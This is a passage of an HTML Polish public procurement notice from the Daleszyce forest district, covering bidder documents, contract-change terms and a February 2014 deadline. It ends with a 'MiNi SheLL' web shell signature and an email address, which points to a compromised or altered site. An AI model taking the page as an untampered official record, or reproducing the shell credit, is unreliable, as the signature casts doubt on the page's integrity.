<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dowodami o których mowa powyżej są:
- poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
- oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.


Zamawiający określa, że usługą, której dotyczy obowiązek wykazania przez wykonawcę w wykazie i złożenie dla niej poświadczeń, dotyczy co najmniej dwóch głównych usług o charakterze odpowiadającym przedmiotowi zamówienia, która każda trwała nieprzerwalnie min. 5 miesięcy. Wykonawca nie może sumować okresu kilku usług o mniejszym zakresie dla uzyskania wymaganego przez Zamawiającego okresu.    Wykaz przygotować zgodnie  z załącznikiem  nr 6 do SIWZ.

W  związku z tym, że postępowanie o udzielenie zamówienia publicznego jest wszczynanie w okresie 12 miesięcy od dnia wejścia w życie  rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 19 lutego 2013r. poz. 231) wykonawca, w miejsce poświadczeń, o których mowa w § 1 ust. 2 pkt 1 rozporządzenia, może przedkładać dokumenty potwierdzające należyte wykonanie  usług, określone w § 1 ust. 1 pkt 2 i 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).
W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny w/w wykaz</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu wykazania spełnienia warunków udziału w postępowaniu do ofert należy załączyć następujące oświadczenia i dokumenty: 

6.2.1.	Wykonawca zobowiązany jest do złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (jeżeli oferta jest składana wspólnie przez kilka podmiotów, oświadczenie takie powinno być złożone, jako jedno podpisane przez wszystkich partnerów lub ich pełnomocnika) - zgodnie z Załącznikiem nr 2 do SIWZ.

6.3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zamawiający wymaga by Wykonawca wykazał w jaki sposób czynny (faktyczny) będą przekazywane te zasoby w szczególności przy poleganiu na wiedzy  i doświadczeniu innych podmiotów.
Odwoływanie się do potencjału podmiotów trzecich jest uprawnieniem wykonawcy. Jeżeli z niego korzysta, zobowiązany jest zgodnie z art. 26 ust. 2b ustawy Pzp wykazać, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. Wykonawca musi po pierwsze: wskazać zasoby którymi będzie dysponował a zamawiający oceni, czy są one wystarczające do należytego wykonania zamówienia,  po drugie: wykonawca zobowiązany jest wykazać dostępność tych zasobów, a więc określić m.in. stosunek łączący go z podmiotem trzecim. Jeżeli w ocenie zamawiającego informacje będą niewystarczające tj. zamawiający uzna, iż wykonawca w niewystarczający sposób udowodnił dysponowanie niezbędnymi dla należytego wykonania zamówienia zasobami podmiotów trzecich, może żądać właściwych dowodów, a w szczególności zakresu dostępnych wykonawcy zasobów innego podmiotu, sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, charakteru stosunku jaki będzie łączył wykonawcę z innym podmiotem, zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 
Zamawiający żąda złożenia w ofercie stosownych dowodów w zakresie niezbędnym do udowodnienia, iż wykonawca dysponuje zasobami niezbędnymi dla należytego wykonania danego zamówienia, w zależności od okoliczności przypadku z którego korzysta wykonawca. Dowodami tymi mogą być  dokumenty dotyczące w szczególności: 
a) zakresu dostępnych wykonawcy zasobów innego podmiotu, 
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.1. Wszelkie istotne dla stron postanowienia zawiera wzór umowy stanowiący załącznik nr 8 do SIWZ. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. 
16.2. Zamawiający zastrzega sobie prawo do odstąpienia od zawarcia umowy 
w wyjątkowych sytuacjach, zgodnie z art. 145 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z dnia 8 czerwca 2010 r. Nr 113 poz. 759 z późniejszymi zmianami).

16.3	Zmiana postanowień umowy może nastąpić pisemnie wyłącznie za zgodą obu stron w zakresie SIWZ i złożonej oferty wyrażoną w formie aneksu lub odrębnej umowy. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy 
w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, 
w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. 


1.	Zmiana terminu realizacji przedmiotu umowy  
a)	Termin rozpoczęcia i zakończenia dyżuru przeciwpożarowego  wynika z terminu rozpoczęcia i zakończenia akcji p-poż. określonego zarządzeniem wydawanym corocznie przez Dyrektora Regionalnej Dyrekcji  Lasów Państwowych w Radomiu.
b)	Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy  skutkujące niemożliwością prowadzenia prac.
c)	W przypadku wystąpienia okoliczności wymienionych w ppkt. b) termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż  o okres trwania tych okoliczności. 

2. Zmiana sposobu spełnienia świadczenia:
a)	Zmiany osobowe:
	zmiana osób, przy pomocy, których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa SIWZ, będzie wymagała również zaakceptowania przez zamawiającego.
3.	Pozostałe zmiany:
a)	zmiana obowiązującej stawki VAT:
jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia 
o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę;
 jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia 
o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez wykonawcę,
b)	zmiany uzasadnione okolicznościami o których mowa w art. 357.1 Kc z uwzględnieniem faktu, że za rażącą zostanie uznana strata w wysokości, o której mowa w art. 397 ksh. 
k)	Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
l)	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010r.,  Nr 113, poz. 759, z późn. zm.):
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego); 
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami;
c)	udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych;
d)	udzielenie zamówień uzupełniających w zakresie wskazanym w specyfikacji istotnych warunków zamówienia..
16.4.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy z dnia 29 stycznia  2004 r. - Prawo zamówień publicznych (tekst jednolity Dz. U. z 2013 r.,  poz. 905 z późniejszymi  zmianami).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_radom/nadl_daleszyce/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_radom/nadl_daleszyce/zamowienia_publiczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2014 godzina 09:00, miejsce: sekretariat Nadleśnictwa Daleszyce. ul. Zakościele 7A; 26-021 Daleszyce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com